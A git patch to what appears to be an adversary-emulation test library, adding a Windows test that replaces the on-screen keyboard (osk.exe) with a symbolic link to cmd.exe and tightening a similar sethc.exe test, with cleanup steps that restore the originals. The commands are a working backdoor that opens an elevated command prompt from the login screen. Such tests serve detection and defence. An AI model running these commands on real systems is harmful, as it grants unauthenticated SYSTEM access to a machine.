From 8300ec7632cd47e34fb9e1e97f6e527ad3352b4e Mon Sep 17 00:00:00 2001
From: Carrie Roberts <clr2of8@gmail.com>
Date: Wed, 2 Nov 2022 10:54:33 -0700
Subject: [PATCH] Create Symbolic Link From osk.exe to cmd.exe (#2218)

* Create Symbolic Link From osk.exe to cmd.exe

* Update T1546.008.yaml
---
 atomics/T1546.008/T1546.008.yaml | 28 ++++++++++++++++++++++++++--
 1 file changed, 26 insertions(+), 2 deletions(-)

diff --git a/atomics/T1546.008/T1546.008.yaml b/atomics/T1546.008/T1546.008.yaml
index f4fbadb0..0971ed73 100644
--- a/atomics/T1546.008/T1546.008.yaml
+++ b/atomics/T1546.008/T1546.008.yaml
@@ -54,11 +54,35 @@ atomic_tests:
   - windows
   executor:
     command: |
-      copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
+      IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
       takeown /F C:\Windows\System32\sethc.exe /A
       icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
       copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
     cleanup_command: |
       copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe
     name: command_prompt
-    elevation_required: true
\ No newline at end of file
+    elevation_required: true
+- name: Create Symbolic Link From osk.exe to cmd.exe
+  description: |
+    Replace accessiblity executable with cmd.exe to provide elevated command prompt from login screen without logging in.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
+      takeown /F %windir%\System32\osk.exe /A
+      icacls %windir%\System32\osk.exe /grant Administrators:F /t
+      del %windir%\System32\osk.exe
+      mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
+    cleanup_command: |
+      takeown /F %windir%\System32\osk.exe /A
+      icacls %windir%\System32\osk.exe /grant Administrators:F /t
+      del %windir%\System32\osk.exe
+      copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
+      icacls %windir%\system32\osk.exe /inheritance:d
+      icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
+      icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
+      icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
+      icacls %windir%\system32\osk.exe /grant:r Administrators:RX
+    name: command_prompt
+    elevation_required: true